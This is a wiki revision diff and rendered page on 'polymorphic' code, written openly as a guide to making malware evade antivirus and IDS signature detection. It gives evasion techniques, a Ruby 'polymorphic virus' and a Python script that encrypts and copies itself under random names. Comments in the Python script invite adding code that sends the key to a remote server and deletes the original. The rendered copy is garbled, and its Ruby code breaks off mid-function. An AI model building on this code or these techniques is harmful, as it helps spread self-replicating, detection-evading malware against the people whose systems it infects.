Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Polymorphic"

From NetSec
Jump to: navigation, search
(Techniques of polymorphic code writing)
Line 1: Line 1:
 
'''Adj. referring to self-modifying code.'''
 
'''Adj. referring to self-modifying code.'''
= Reasons to write polymorphic code =
+
== Reasons to write polymorphic code ==
  
 
The main reason to write polymorphic code is to avoid being [[Cryptography#Hashes|hashwise identified]], or to have code signature detected, i.e. an [[IDS]] or anti-virus software will not identify the payload as it is nicely wrapped-up in an [[cryptography|encrypted form]]. Another reason is to propagate it to multiple copies without having the same signature.
 
The main reason to write polymorphic code is to avoid being [[Cryptography#Hashes|hashwise identified]], or to have code signature detected, i.e. an [[IDS]] or anti-virus software will not identify the payload as it is nicely wrapped-up in an [[cryptography|encrypted form]]. Another reason is to propagate it to multiple copies without having the same signature.
  
= Techniques of polymorphic code writing =
+
== Techniques of polymorphic code writing ==
  
 
* Define a stackable set of encrypting/decrypting functions, preferrably working with an encryption key. Let's call these sets d and e (decryption / encryption), and let there be two integers n, m, n > m so that d[n](d[n-1](...(d[m](e[n](e[n-1](...e[m](code))...) == code
 
* Define a stackable set of encrypting/decrypting functions, preferrably working with an encryption key. Let's call these sets d and e (decryption / encryption), and let there be two integers n, m, n > m so that d[n](d[n-1](...(d[m](e[n](e[n-1](...e[m](code))...) == code
Line 14: Line 14:
 
* Write the payload code to be dissimulated. At the end of this code put a bootstrap that will decrypt and run the code (in [[PHP]]/[[ruby]]/[[perl]]/whatnot, eval() it, in [[C]], [[Buffer Overflows|smash the stack]] with it, in C#, use reflection). At the beginning of the payload code, call for the encryption/duplication code.
 
* Write the payload code to be dissimulated. At the end of this code put a bootstrap that will decrypt and run the code (in [[PHP]]/[[ruby]]/[[perl]]/whatnot, eval() it, in [[C]], [[Buffer Overflows|smash the stack]] with it, in C#, use reflection). At the beginning of the payload code, call for the encryption/duplication code.
  
= Example in Ruby =
+
== Example in Ruby ==
  
== pv.rb (polymorphic virus) ==
+
=== pv.rb (polymorphic virus) ===
 
{{code | text=<syntaxhighlight lang="ruby">
 
{{code | text=<syntaxhighlight lang="ruby">
 
#!/usr/bin/env ruby1.9.1
 
#!/usr/bin/env ruby1.9.1
Line 53: Line 53:
 
</syntaxhighlight>}}
 
</syntaxhighlight>}}
  
== md.rb (utility functions) ==
+
=== md.rb (utility functions) ===
  
 
{{code | text=<syntaxhighlight lang="ruby">
 
{{code | text=<syntaxhighlight lang="ruby">
Line 81: Line 81:
  
 
</syntaxhighlight>}}
 
</syntaxhighlight>}}
 +
 +
== Example in Python ==
 +
 +
=== poly.py ===
 +
 +
<source lang="python">
 +
#a simple example of a program that replicates and encrypts itself, thus adding a layer of obfuscation / evasion from string matched detectors
 +
#When executed, it executes some code then it generates a new encryption key, encrypts itself and writes it to a new file
 +
#with a randomly generated name [then sends the filename and encryption key to a remote server]
 +
 +
import random
 +
import string
 +
import pyDes
 +
import time
 +
import binascii
 +
 +
#code to execute before self propagation goes here
 +
 +
N = 8 #8 digit key
 +
key = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(N)) #keygen random
 +
obj = pyDes.des(key, pad=b'\0') #generate an object encrypted with key
 +
fd = open('poly.py', 'r') #open this file for reading
 +
payload = fd.read() #load the entire contents into a variable
 +
encrypted = obj.encrypt(payload, pad=b'\0') #encrypt the  payload file
 +
N = 10 # 10 digit file name
 +
filename = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(N)) #filename random
 +
new_fd = open(filename, 'w') #create a new file with the filename we just generated. edit this to change directory
 +
encrypted = binascii.b2a_hex(encrypted)
 +
new_fd.write(str(encrypted)) #write the encrypted program to our new file
 +
 +
#put code to securely transmit your filename + key here! you can also put here code to delete the original
 +
</source>

Revision as of 07:39, 25 November 2011

Adj. referring to self-modifying code.

Reasons to write polymorphic code

The main reason to write polymorphic code is to avoid being hashwise identified, or to have code signature detected, i.e. an IDS or anti-virus software will not identify the payload as it is nicely wrapped-up in an encrypted form. Another reason is to propagate it to multiple copies without having the same signature.

Techniques of polymorphic code writing

  • Define a stackable set of encrypting/decrypting functions, preferrably working with an encryption key. Let's call these sets d and e (decryption / encryption), and let there be two integers n, m, n > m so that d[n](d[n-1](...(d[m](e[n](e[n-1](...e[m](code))...) == code


Savitri says
You can write a single function or pair of functions and have them vary with a series of keys (outputted by a deterministic key generator ideally), as long as your encryption remains revertable.


  • Write the payload code to be dissimulated. At the end of this code put a bootstrap that will decrypt and run the code (in PHP/ruby/perl/whatnot, eval() it, in C, smash the stack with it, in C#, use reflection). At the beginning of the payload code, call for the encryption/duplication code.

Example in Ruby

pv.rb (polymorphic virus)

<syntaxhighlight lang="ruby">

  1. !/usr/bin/env ruby1.9.1

if (!defined?(FILE)) FILE=File.basename(__FILE__) end load "md.rb";

  1. require "FileUtils"

def selfCopy(key) code = "" newkey = deterministicKeygen(key); File.open(FILE, "r").each_line do

md.rb (utility functions)

<syntaxhighlight lang="ruby"> require 'base64'; if (!defined?(MD_LOADED)) def deterministicKeygen(theKey)

       r = Random.new(theKey.to_i);
       return r.rand(3)+3;

end def mencrypt(str, theKey)

       k = deterministicKeygen(theKey)
       k.times do
               str = Base64.encode64(str)
       end
       return str

end def mdecrypt(str, theKey)

       k = deterministicKeygen(theKey)
       k.times do
               str = Base64.decode64(str)
       end
       return str

end

MD_LOADED=true end

</syntaxhighlight>

Example in Python

poly.py

 
#a simple example of a program that replicates and encrypts itself, thus adding a layer of obfuscation / evasion from string matched detectors
#When executed, it executes some code then it generates a new encryption key, encrypts itself and writes it to a new file
#with a randomly generated name [then sends the filename and encryption key to a remote server]
 
import random
import string
import pyDes
import time
import binascii
 
#code to execute before self propagation goes here
 
N = 8 #8 digit key
key = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(N)) #keygen random
obj = pyDes.des(key, pad=b'\0') #generate an object encrypted with key
fd = open('poly.py', 'r') #open this file for reading
payload = fd.read() #load the entire contents into a variable
encrypted = obj.encrypt(payload, pad=b'\0') #encrypt the  payload file
N = 10 # 10 digit file name
filename = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(N)) #filename random
new_fd = open(filename, 'w') #create a new file with the filename we just generated. edit this to change directory
encrypted = binascii.b2a_hex(encrypted)
new_fd.write(str(encrypted)) #write the encrypted program to our new file
 
#put code to securely transmit your filename + key here! you can also put here code to delete the original